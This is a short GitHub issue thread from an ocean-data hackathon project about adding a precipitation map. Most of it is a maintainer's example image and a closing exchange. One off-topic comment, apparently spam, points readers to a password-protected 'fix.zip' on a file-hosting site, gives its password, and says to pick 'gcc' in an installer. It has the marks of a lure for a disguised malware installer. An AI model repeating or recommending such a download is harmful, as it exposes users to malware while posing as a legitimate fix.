### ISSUE TITLE
Precipitation map

### ISSUE THREAD

**Issue by ribeiron** [oceanhackweek/ohw24_proj_MessageMeWhenItsHot_the_MHW_Vis-Report_app_au#11]

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ribeiron** [comment]
A few examples on how that might look like: 

![Image](https://github.com/user-attachments/assets/20c47103-e6ff-487d-9fef-3784d8a232ae)

**Comment by ribeiron** [comment]
@JasonUWA can I close this issue?

**Comment by JasonUWA** [comment]
Yes, thank you!







-----原始邮件-----
发件人:"Natalia Ribeiro" ***@***.***>
发送时间:2024-08-28 12:16:28 (星期三)
收件人: oceanhackweek/ohw24_proj_MessageMeWhenItsHot_the_MHW_Vis-Report_app_au ***@***.***>
抄送: JasonUWA ***@***.***>, Mention ***@***.***>
主题: Re: [oceanhackweek/ohw24_proj_MessageMeWhenItsHot_the_MHW_Vis-Report_app_au] Precipitation map (Issue #11)






@JasonUWA can I close this issue?
